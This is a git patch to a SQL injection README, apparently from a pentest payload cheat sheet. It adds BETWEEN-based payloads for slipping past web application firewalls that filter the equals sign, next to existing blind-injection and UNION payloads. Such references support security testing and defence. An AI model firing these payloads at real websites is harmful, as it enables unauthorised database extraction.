From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001
From: duongdpt
Date: Mon, 28 Oct 2019 22:26:28 +0700
Subject: [PATCH] Update README.md

Add bypass waf using BETWEEN
---
 SQL Injection/README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 8099f6d..8d5162b 100644
--- a/SQL Injection/README.md
+++ b/SQL Injection/README.md
@@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
 SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
 ```
 
-No Equal - bypass using LIKE/NOT IN/IN
+No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
 
 ```sql
 ?id=1 and substring(version(),1,1)like(5)
 ?id=1 and substring(version(),1,1)not in(4,3)
 ?id=1 and substring(version(),1,1)in(4,3)
+?id=1 and substring(version(),1,1) between 3 and 4
 ```
 
 Blacklist using keywords - bypass using uppercase/lowercase
@@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```sql
 AND -> &&
 OR -> ||
-= -> LIKE,REGEXP, not < and not >
+= -> LIKE,REGEXP, BETWEEN, not < and not >
 > X -> not between 0 and X
 WHERE -> HAVING
 ```